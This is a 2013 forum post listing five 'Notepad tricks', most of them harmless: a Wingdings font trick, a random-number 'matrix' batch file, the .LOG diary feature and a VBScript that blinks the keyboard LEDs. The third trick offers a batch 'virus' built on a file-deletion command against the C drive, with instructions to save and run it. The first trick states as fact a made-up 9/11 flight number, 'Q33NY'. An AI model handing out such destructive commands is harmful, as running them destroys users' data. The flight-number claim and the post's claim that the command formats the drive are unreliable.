Top 5 Cool Notepad Tricks Glitterfy3033310T584B81
Lσgιη Iғ Yσυ Aяε α Mεмвεя

Oя

Rεgιsтεя Tσ Bε Mεмвεя Oғ Tнιs Fσяυм


Join the forum, it's quick and easy

Top 5 Cool Notepad Tricks Glitterfy3033310T584B81
Lσgιη Iғ Yσυ Aяε α Mεмвεя

Oя

Rεgιsтεя Tσ Bε Mεмвεя Oғ Tнιs Fσяυм
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Google Translater
IP Address
You are from
%%v_FLG%% %%v_IP%%
%%v_CR%% ,%%v_RG%%, %%v_CI%%
%%v_OS_IMG%% %%v_OS%%
%%v_BRW_IMG%% %%v_BRW%%
%%v_I_RESO%% %%v_RESO%% %%v_I_CLR%% %%v_CLR%%
Who is online?
In total there is 1 user online :: 0 Registered, 0 Hidden and 1 Guest

None

Most users ever online was 17 on Mon Nov 13, 2023 12:55 am
Visitors

Top 5 Cool Notepad Tricks

Go down

Top 5 Cool Notepad Tricks Empty Top 5 Cool Notepad Tricks

Post by Administrator Wed May 29, 2013 11:45 pm

[You must be registered and logged in to see this image.]

1. World Trade Center Attack Trick

[You must be registered and logged in to see this image.]
The flight number of the plane that had hit World Trade Center on (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
2. Increase the font size to 72.
3. Change the Font to Wingdings.

  • World Trade Center Notepad Trick


2. Matrix Effect Trick


[You must be registered and logged in to see this image.]

In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


2. Now save this file as Matrix.bat (name can be anything but .bat is must)
3. Open your saved file and you will have matrix effect on your screen.

  • Matrix Effect Using Notepad


3. Creating Virus That Format C Drive


[You must be registered and logged in to see this image.]
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat

3. Now, running this file format C Drive

4. Making Personal Diary Using Notepad



[You must be registered and logged in to see this image.]
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
1. Open Notepad and Type .LOG (in capital Letters and press enter
2. Save the program with any name and close it.
3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad
Make Personal Diary Using Notepad

5. Dancing Keyboard Led

[You must be registered and logged in to see this image.]

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop


2. Then save this file as dance.vbs (name can be anything but .vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.

  • Keyboard Dancing Led Light Trick
Administrator
Administrator
Admin

Posts : 239
Join date : 2013-05-29
Age : 35
Location : India

https://saudatricks.forummotion.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum